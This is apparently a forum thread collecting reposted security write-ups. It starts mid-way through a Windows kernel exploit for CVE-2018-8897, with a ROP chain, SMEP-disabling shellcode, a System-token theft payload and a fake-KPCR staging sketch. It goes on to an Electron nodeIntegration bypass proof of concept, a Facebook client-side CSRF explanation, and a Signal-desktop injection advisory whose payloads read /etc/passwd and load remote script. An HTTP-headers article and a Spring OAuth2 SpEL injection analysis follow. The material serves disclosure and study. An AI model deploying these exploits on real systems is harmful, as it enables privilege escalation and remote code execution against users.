for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode. 
The final chain will look something like: -- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010) In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below: NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); } We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete! Let’s make a simple demo stealing the System token: uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken ); Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897 Credits: @0xNemi and @nickeverdox for finding the vulnerability P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try! 
P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code: Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
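As a side note to section 0x1: the KPCR fix-ups described there can be staged from user mode in a few lines. This is only a sketch; the offsets are the build-specific values quoted in the article, the Pcr.Self offset of 0x18 is an assumption, and every name here is hypothetical rather than taken from the original source.

#include <stdint.h>
#include <stdlib.h>

static void* BuildFakeGsBase( void )
{
    uint8_t* Pcr     = ( uint8_t* ) calloc( 1, 0x10000 );   // fake KPCR + KPRCB + scratch space
    uint8_t* Thread  = ( uint8_t* ) calloc( 1, 0x1000 );    // fake KTHREAD
    uint8_t* Process = ( uint8_t* ) calloc( 1, 0x1000 );    // fake KPROCESS

    *( void** )    ( Pcr + 0x18 )           = Pcr;           // Pcr.Self (assumed offset)
    *( void** )    ( Pcr + 0x20 )           = Pcr + 0x180;   // Pcr.CurrentPrcb
    *( uint32_t* ) ( Pcr + 0x180 )          = 0x1F80;        // Prcb.MxCsr, default valid value
    *( void** )    ( Pcr + 0x188 )          = Thread;        // Prcb.CurrentThread
    *( uint64_t* ) ( Pcr + 0x1A8 )          = 1;             // Prcb.RspBase, must differ from InitialStack
    *( void** )    ( Pcr + 0x180 + 0x62C0 ) = Pcr + 0x3000;  // Prcb.Context, any writable pointer

    *( uint64_t* ) ( Thread + 0x28 ) = 0;                    // KThread.InitialStack
    *( void** )    ( Thread + 0xB8 ) = Process;              // ApcStateFill.Process

    return Pcr;                                              // value to load with wrgsbase
}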
  8. CVE-2018-1000136 - Electron nodeIntegration Bypass
May 10, 2018 | Posted by Brendan Scarvell

A few weeks ago, I came across a vulnerability that affected all current versions of Electron at the time (< 1.7.13, < 1.8.4, and < 2.0.0-beta.3). The vulnerability allowed nodeIntegration to be re-enabled, leading to the potential for remote code execution. If you're unfamiliar with Electron, it is a popular framework that allows you to create cross-platform desktop applications using HTML, CSS, and JavaScript. Some popular applications such as Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop are all built using the Electron framework. You can find a list of applications built with Electron here.

Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also to all of Node.js' built-in modules. This makes XSS particularly dangerous, as an attacker's payload can do some nasty things such as requiring in the child_process module and executing system commands on the client side. Atom had an XSS vulnerability not too long ago which did exactly that. You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.

There's also a WebView tag feature which allows you to embed content, such as web pages, into your Electron application and run it as a separate process. When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default. The documentation states that if the webviewTag option is not explicitly declared in your webPreferences, it will inherit the same permissions as whatever nodeIntegration is set to.

By default, Electron also uses its own custom window.open() function which creates a new instance of a BrowserWindow. The child window will inherit all of the parent window's options (which includes its webPreferences) by default. The custom window.open() function does allow you to override some of the inherited options by passing in a features argument:

if (!usesNativeWindowOpen) {
  // Make the browser window or guest view emit "new-window" event.
  window.open = function (url, frameName, features) {
    if (url != null && url !== '') {
      url = resolveURL(url)
    }
    const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features))
    if (guestId != null) {
      return getOrCreateProxy(ipcRenderer, guestId)
    } else {
      return null
    }
  }
  if (openerId != null) {
    window.opener = getOrCreateProxy(ipcRenderer, openerId)
  }
}

When Electron's custom window.open function is called, it emits an ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN event. The ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN event handler then parses the features provided, adding them as options to the newly created window, and then emits an ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event.
To prevent child windows from being able to do nasty things like re-enabling nodeIntegration when the parent window has it explicitly disabled, guest-window-manager.js contains a hardcoded list of webPreferences options and their restrictive values:

// Security options that child windows will always inherit from parent windows
const inheritedWebPreferences = new Map([
  ['contextIsolation', true],
  ['javascript', false],
  ['nativeWindowOpen', true],
  ['nodeIntegration', false],
  ['sandbox', true],
  ['webviewTag', false]
]);

The ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event handler then calls the mergeBrowserWindowOptions function, which ensures that the restricted attributes of the parent window's webPreferences are applied to the child window:

const mergeBrowserWindowOptions = function (embedder, options) {
  [...]
  // Inherit certain option values from parent window
  for (const [name, value] of inheritedWebPreferences) {
    if (embedder.getWebPreferences()[name] === value) {
      options.webPreferences[name] = value
    }
  }
  // Sets correct openerId here to give correct options to 'new-window' event handler
  options.webPreferences.openerId = embedder.id
  return options
}

And here is where the vulnerability lies. The mergeBrowserWindowOptions function didn't take into account what the default values of these restricted attributes should be if they were undefined. In other words, if webviewTag: false wasn't explicitly declared in your application's webPreferences (and was therefore being inferred by explicitly setting nodeIntegration: false), when mergeBrowserWindowOptions went to check the webviewTag, it would come back undefined, thus making the above if statement return false and not apply the parent's webviewTag preference. This allowed window.open to pass the webviewTag option as an additional feature, re-enabling nodeIntegration and allowing the potential for remote code execution.

The following proof-of-concept shows how an XSS payload can re-enable nodeIntegration during run time and allow execution of system commands:

<script>
var x = window.open('data://yoloswag','','webviewTag=yes,show=no');
x.eval(
  "var webview = new WebView;"+
  "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+
  "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+
  "document.body.appendChild(webview)"
);
</script>

If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution, provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3) and hasn't manually opted into one of the following:
- Declared webviewTag: false in its webPreferences.
- Enabled the nativeWindowOpen option in its webPreferences.
- Intercepted new-window events and overridden event.newGuest without using the supplied options tag.

We'd also like to thank the Electron team for being extremely responsive and for quickly providing a patch to the public. This vulnerability was assigned the CVE identifier CVE-2018-1000136.

Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/
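As a defensive footnote (this is not part of the original advisory, just a sketch of the opt-outs it lists): an application on an affected Electron version can pin the restricted options explicitly instead of relying on nodeIntegration: false alone. The URL below is a placeholder.

// Sketch: state the restricted webPreferences explicitly and refuse unexpected child windows.
const { app, BrowserWindow } = require('electron');

app.on('ready', () => {
  const win = new BrowserWindow({
    webPreferences: {
      nodeIntegration: false,
      webviewTag: false,       // declare it; don't let it be inferred
      contextIsolation: true,
      sandbox: true
    }
  });

  // Belt and braces: block child windows the app never expects to open.
  win.webContents.on('new-window', (event) => event.preventDefault());

  win.loadURL('https://example.invalid/app/index.html'); // placeholder
});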
  9. “Client-Side” CSRF
Facebook Bug Bounty | Friday, May 11, 2018

At Facebook, the Whitehat program receives hundreds of submissions a month, covering a wide range of vulnerability types. One of the interesting classes of issue which we've seen recently is what we've termed “Client-Side” Cross-Site Request Forgery (CSRF), for which we've awarded on average $7.5k.

What is CSRF?
Before we jump into technical details, let's recap on what CSRF is. This is a class of issue in which an attacker can perform a state-changing action, such as posting a status, on behalf of another user. This is made possible due to the fact that browsers (currently, until Same-Site Cookies are supported in all major browsers) send the user's cookies with a request, regardless of the request origin. At Facebook, like other large sites, we have protections in place to mitigate this kind of attack. The most common type of protection is adding a random token to each state-changing request, and verifying it server-side. An attacker has no way of knowing this value in advance, which means we can ensure any request has explicitly been made by the user. If you're participating in our Whitehat program, then you might see this token being sent - we name it “fb_dtsg”.

“Client-Side” CSRF
Whilst most researchers think of CSRF as a server-side problem, “Client-Side” CSRF exists in the user's browser or mobile device - a malicious user could perform arbitrary requests to a CSRF-protected end-point by modifying the end-point to which the client-side code makes an HTTP request with a valid CSRF token. This could be a form submission, or an XHR call. For example, a product might want to log some analytic data after the page is loaded, which could look like the following code:

let analytic_uri = window.location.hash.substr(1);
(new AsyncRequest("/ajax" + analytic_uri))
  .method(POST)
  .setBody({csrf_token: csrf_token})
  .send()

The user would browse to /profile.php#/profile/log. On page load, the JS would make a POST request to "/ajax/profile/log", and the data would be saved. However, if an attacker modifies the fragment to "#/updatestatus?status=Hello", then the JS is instead making a request to update the user's status, with a valid CSRF token. One good trick for hunting for this kind of issue is looking for HTTP requests which are made after the page is rendered - if the end-point being requested is contained in the page's query string or fragment, then it's worth investigating! If you can only control part of the end-point, then it could still be vulnerable, by using tricks like path traversal.

Making arbitrary GraphQL requests
We had a great submission from one of our top researchers, Philippe Harewood, which used this style of issue to make arbitrary GraphQL requests on behalf of another user, for which we rewarded him $7,500. On https://business.instagram.com, we had a page which took a business ID from the request, and made a Graph API request to that particular business:

POST /[business_id]?fields=... access_token=...

Facebook's Graph API is protected against CSRF by requiring a valid access token from the user. Without this token, the request is unauthenticated. Philippe found that since the business ID wasn't validated to be an integer, he could change this to point to our GraphQL end-point (graphql), and make authenticated requests for the user (such as posting a new status), since the JS was making the request with the access token:

POST /graphql?q=Mutation...&fields=... access_token=...
This is a great example of influencing authenticated requests to point somewhere completely unintended.

Conclusion
These issues are an interesting and novel take on an older class of bugs, which has prompted us to take a look at ways of detecting and mitigating bugs in JS. If you too enjoy investigating and solving novel bugs, then come join the ProdSec team!

Sursa: https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/
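A hedged illustration of the client-side fix implied above (not code from the original post; AsyncRequest, csrf_token and the endpoint names are the placeholders used in the earlier example): validate the attacker-influenced path against an allowlist before attaching the token.

// Sketch: only endpoints that are explicitly allowed ever receive the CSRF token.
const ALLOWED_ENDPOINTS = new Set(['/profile/log', '/profile/view']);

function logAnalytics() {
  let analytic_uri = window.location.hash.substr(1);
  if (!ALLOWED_ENDPOINTS.has(analytic_uri)) {
    return; // "#/updatestatus?status=Hello" and path-traversal tricks are rejected here
  }
  (new AsyncRequest('/ajax' + analytic_uri))
    .method(POST)
    .setBody({csrf_token: csrf_token})
    .send();
}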
  10. signal-desktop HTML tag injection advisory

Title: Signal-desktop HTML tag injection
Date Published: 2018-05-14
Last Update: 2018-05-14
CVE Name: CVE-2018-10994
Class: Code injection
Remotely Exploitable: Yes
Locally Exploitable: No
Vendors contacted: Signal.org

Vulnerability Description:
Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (cross-site scripting).

Vulnerable Packages:
Signal-desktop messenger v1.7.1
Signal-desktop messenger v1.8.0
Signal-desktop messenger v1.9.0
Signal-desktop messenger v1.10.0
Originally found in v1.9.0 and v1.10.0, but after reviewing the source code the aforementioned are the impacted versions.

Solution/Vendor Information/Workaround:
Upgrade to Signal-desktop messenger v1.10.1 or v1.11.0-beta.3. For safer communications on desktop systems, please consider the use of a safer end-point client like PGP or GnuPG instead.

Credits:
This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos).

Technical Description – Exploit/Concept Code:
While discussing an XSS vulnerability on a website using the Signal-desktop messenger, it was found that the messenger software also displayed a code-injection vulnerability while parsing the affected URLs. The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically, the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable.

In the Windows operating system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the signal-desktop client by sending a specially crafted message.
Examples: Show an iframe with some text: http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E Display content of user’s own /etc/passwd file: http://hacktheplanet/?p=%3d%3Ciframe%20src=/etc/passwd%3E Include and execute a remote JavaScript file (for Windows clients): http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E Show a base64-encoded image (bypass “click to download image”): http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e Timeline: 2018-05-10 18:45 GMT-3: vuln discovered 2018-05-11 13:03 GMT-3: emailed Signal security team 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch ongoing 2018-05-11 16:12 GMT-3: patch committed 2018-05-11 18:00 GMT-3: signal-desktop update published 2018-05-14 18:00 GMT-3: public disclosure References: Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…v1.11.0-beta.3 Writeup: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/ Sursa: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/advisory/
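For completeness, the general fix this advisory points at (this is a sketch, not the actual Signal patch linked above) is to treat incoming message bodies as text rather than markup when they are rendered:

// Sketch: render a message body as text; textContent never parses <img>, <iframe> or <script>.
function renderMessage(container, messageBody) {
  const bubble = document.createElement('div');
  bubble.className = 'message';
  bubble.textContent = messageBody;
  container.appendChild(bubble);
}

// The vulnerable pattern, by contrast, looks roughly like:
//   container.innerHTML += decorate(messageBody); // any tags in messageBody get parsed and executed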
  11. The headers we don't want
By Andrew Betts | May 10, 2018

If you want to learn more about headers, don’t miss Andrew’s talk at Altitude London on May 22.

HTTP headers are an important way of controlling how caches and browsers process your web content. But many are used incorrectly or pointlessly, which adds overhead at a critical time in the loading of your page, and may not work as you intended. In this first of a series of posts about header best practice, we’ll look at unnecessary headers.

Most developers know about and depend on a variety of HTTP headers to make their content work. Those that are best known include Content-Type and Content-Length, which are both almost universal. But more recently, headers such as Content-Security-Policy and Strict-Transport-Security have started to improve security, and Link rel=preload headers to improve performance. Few sites use these, despite their wide support across browsers.

At the same time, there are lots of headers that are hugely popular but aren’t new and aren’t actually all that useful. We can prove this using HTTP Archive, a project run by Google and sponsored by Fastly that loads 500,000 websites every month using WebPageTest, and makes the results available in BigQuery. From the HTTP Archive data, here are the 30 most popular response headers (based on the number of domains in the archive which are serving each header), and roughly how useful each one is:

Header name | Requests | Domains | Status
date | 48779277 | 535621 | Required by protocol
content-type | 47185627 | 533636 | Usually required by browser
server | 43057807 | 519663 | Unnecessary
content-length | 42388435 | 519118 | Useful
last-modified | 34424562 | 480294 | Useful
cache-control | 36490878 | 412943 | Useful
etag | 23620444 | 412370 | Useful
content-encoding | 16194121 | 409159 | Required for compressed content
expires | 29869228 | 360311 | Unnecessary
x-powered-by | 4883204 | 211409 | Unnecessary
pragma | 7641647 | 188784 | Unnecessary
x-frame-options | 3670032 | 105846 | Unnecessary
access-control-allow-origin | 11335681 | 103596 | Useful
x-content-type-options | 11071560 | 94590 | Useful
link | 1212329 | 87475 | Useful
age | 7401415 | 59242 | Useful
x-cache | 5275343 | 56889 | Unnecessary
x-xss-protection | 9773906 | 51810 | Useful
strict-transport-security | 4259121 | 51283 | Useful
via | 4020117 | 47102 | Unnecessary
p3p | 8282840 | 44308 | Unnecessary
expect-ct | 2685280 | 40465 | Useful
content-language | 334081 | 37927 | Debatable
x-aspnet-version | 676128 | 33473 | Unnecessary
access-control-allow-credentials | 2804382 | 30346 | Useful
x-robots-tag | 179177 | 24911 | Not relevant to browsers
x-ua-compatible | 489056 | 24811 | Unnecessary
access-control-allow-methods | 1626129 | 20791 | Useful
access-control-allow-headers | 1205735 | 19120 | Useful

Let’s look at the unnecessary headers and see why we don’t need them, and what we can do about it.

Vanity (server, x-powered-by, via)
You may be very proud of your choice of server software, but most people couldn’t care less. At worst, these headers might be divulging sensitive data that makes your site easier to attack.

Server: apache
X-Powered-By: PHP/5.1.1
Via: 1.1 varnish, 1.1 squid

RFC7231 allows for servers to include a Server header in the response, identifying the software used to serve the content. This is most commonly a string like “apache” or “nginx”. While it’s allowed, it’s not mandatory, and offers very little value to either developers or end users. Nevertheless, this is the third most popular HTTP response header on the web today.
X-Powered-By is the most popular header in our list that is not defined in any standard, and has a similar purpose, though normally refers to the application platform that sits behind the web server. Common values include “ASP.net”, “PHP” and “Express”. Again this isn’t providing any tangible benefit and is taking up space.

More debatable perhaps is Via, which is required (by RFC7230) to be added to the request by any proxy through which it passes to identify the proxy. This can be the proxy’s hostname, but is more likely to be a generic identifier like “vegur”, “varnish”, or “squid”. Removing (or not setting) this header on a request can cause proxy forwarding loops. However, interestingly it is also copied into the response on the way back to the browser, and here it’s just informational and no browsers do anything with it, so it’s reasonably safe to get rid of it if you want to.

Deprecated standards (P3P, Expires, X-Frame-Options, X-UA-Compatible)
Another category of headers is those that do have an effect in the browser but are not (or are no longer) the best way of achieving that effect.

P3P: cp="this is not a p3p policy"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge

P3P is a curious animal. I had no idea what this was, and even more curiously, one of the most common values is “this is not a p3p policy”. Well, is it, or isn’t it? The story here goes back to an attempt to standardise a machine readable privacy policy. There was disagreement on how to surface the data in browsers, and only one browser ever implemented the header - Internet Explorer. Even in IE though, P3P didn’t trigger any visual effect to the user; it just needs to be present to permit access to third party cookies in iframes. Some sites even set a non-conforming P3P policy like the one above – even though doing so is on shaky legal ground. Needless to say, reading third party cookies is generally a bad idea, so if you don’t do it, then you won’t need to set a P3P header!

Expires is almost unbelievably popular, considering that Cache-Control has been preferred over Expires for 20 years. Where a Cache-Control header includes a max-age directive, any Expires header on the same response will be ignored. But there are a massive number of sites setting both, and the Expires header is most commonly set to Thu, 01 Dec 1994 16:00:00 GMT, because you want your content to not be cached and copy-pasting the example date from the spec is certainly one way of doing that. But there is simply no reason to do this. If you have an Expires header with a date in the past, replace it with:

Cache-Control: no-store, private

(no-store is a very strong directive not to write the content to persistent storage, so depending on your use case you might actually prefer no-cache for better performance, for example when using back/forward navigation or resuming hibernated tabs)

Some of the tools that audit your site will tell you to add an X-Frame-Options header with a value of ‘SAMEORIGIN’. This tells browsers that you are refusing to be framed by another site, and is generally a good defense against clickjacking. However, the same effect can be achieved, with more consistent support and more robust definition of behaviour, by doing:

Content-Security-Policy: frame-ancestors 'self'

This has the additional benefit of being part of a header (CSP) which you should have anyway for other reasons (more on that later). So you can probably do without X-Frame-Options these days.
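If you are already manipulating headers at the edge (as the end of this post does with VCL), that is also a convenient place to make this swap. A rough sketch for Fastly VCL in vcl_deliver, assuming you have no existing Content-Security-Policy to merge with, might be:

set resp.http.Content-Security-Policy = "frame-ancestors 'self'";
unset resp.http.X-Frame-Options;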
Finally, back in their IE9 days, Microsoft introduced ‘compatibility view’, and would potentially render a page using the IE8 or IE7 engine, even when the user was browsing with IE9, if the browser thought that the page might require the earlier version to work properly. Those heuristics were not always correct, and developers were able to override them by using an X-UA-Compatible header or meta tag. In fact, this increasingly became a standard part of frameworks like Bootstrap. These days, this header achieves very little - very few people are using browsers that would understand it, and if you are actively maintaining your site it’s very unlikely that you are using technologies that would trigger compatibility view.

Debug data (X-ASPNet-Version, X-Cache)
It’s kind of astonishing that some of the most popular headers in common use are not in any standard. Essentially this means that somehow, thousands of websites seem to have spontaneously agreed to use a particular header in a particular way.

X-Cache: HIT
X-Request-ID: 45a336c7-1bd5-4a06-9647-c5aab6d5facf
X-ASPNet-Version: 3.2.32
X-AMZN-RequestID: 0d6e39e2-4ecb-11e8-9c2d-fa7ae01bbebc

In reality, these ‘unknown’ headers are not separately and independently minted by website developers. They are typically artefacts of using particular server frameworks, software or specific vendors’ services (in this example set, the last header is a common AWS header). X-Cache, in particular, is actually added by Fastly (other CDNs also do this), along with other Fastly-related headers like X-Cache-Hits and X-Served-By. When debugging is enabled, we add even more, such as Fastly-Debug-Path and Fastly-Debug-TTL. These headers are not recognised by any browser, and removing them makes no difference to how your pages are rendered. However, since these headers might provide you, the developer, with useful information, you might like to keep a way of turning them on.

Misunderstandings (Pragma)
I didn’t expect to be in 2018 writing a post about the Pragma header, but according to our HTTP Archive data it’s still the 11th most popular. Not only was Pragma deprecated as long ago as 1997, but it was never intended to be a response header anyway - as specified, it only has meaning as part of a request.

Pragma: no-cache

Nevertheless, its use as a response header is so widespread that some browsers recognise it in this context as well. Today the probability that your response will transit a cache that understands Pragma in a response context, and doesn’t understand Cache-Control, is vanishingly small. If you want to make sure that something isn’t cached, Cache-Control: no-store, private is all you need.

Non-Browser (X-Robots-Tag)
One header in our top 30 is a non-browser header. X-Robots-Tag is intended to be consumed by a crawler, such as Google or Bing’s bots. Since it has no meaning to a browser, you could choose to only set it when the requesting user-agent is a crawler. Equally, you might decide that this makes testing harder, or perhaps that it violates the terms of service of the search engine.

Bugs
Finally, it’s worth finishing on an honourable mention for simple bugs. In a request, a Host header makes sense, but seeing it on a response probably means your server is misconfigured somehow (I’d love to know how, exactly). Nevertheless, 68 domains in HTTP Archive are returning a Host header in their responses.

Removing headers at the edge
Fortunately, if your site is behind Fastly, removing headers is pretty easy using VCL.
It makes sense that you might want to keep the genuinely useful debug data available to your dev team, but hide it for public users, so that’s easily done by detecting a cookie or inbound HTTP header: unset resp.http.Server; unset resp.http.X-Powered-By; unset resp.http.X-Generator; if (!req.http.Cookie:debug && !req.http.Debug) { unset resp.http.X-Amzn-RequestID; unset resp.http.X-Cache; } In the next post in this series, I’ll be talking about best practices for headers that you should be setting, and how to enable them at the edge Author Andrew Betts |Web Developer and Principal Developer Advocate Sursa: https://www.fastly.com/blog/headers-we-dont-want
  12. Beware of the Magic SpEL(L) – Part 2 (CVE-2018-1260) Written by Philippe Arteau On Tuesday, we released the details of RCE vulnerability affecting Spring Data (CVE-2018-1273). We are now repeating the same exercise for a similar RCE vulnerability in Spring Security OAuth2 (CVE-2018-1260). We are going to present the attack vector, its discovery method and the conditions required for exploitation. This vulnerability also has similarities with another vulnerability disclosed in 2016. The resemblance will be discussed in the section where we review the fix. Analyzing a potential vulnerability It all started by the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of SpelExpressionParser.parseExpression() with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets “${…}”. public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } 1 2 3 4 5 6 7 8 9 10 11 12 public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } The controller class WhitelabelApprovalEndpoint uses this SpelView class to build the approval page for OAuth2 authorization flow. The SpelView class evaluates the string named “template” – see code below – as a Spring Expression. @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map&lt;String, Object&gt; model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } 1 2 3 4 5 6 7 8 @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map&lt;String, Object&gt; model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } Following the methods createTemplate() and createScopes(), we can see that the attribute “scopes” is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user. protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] 
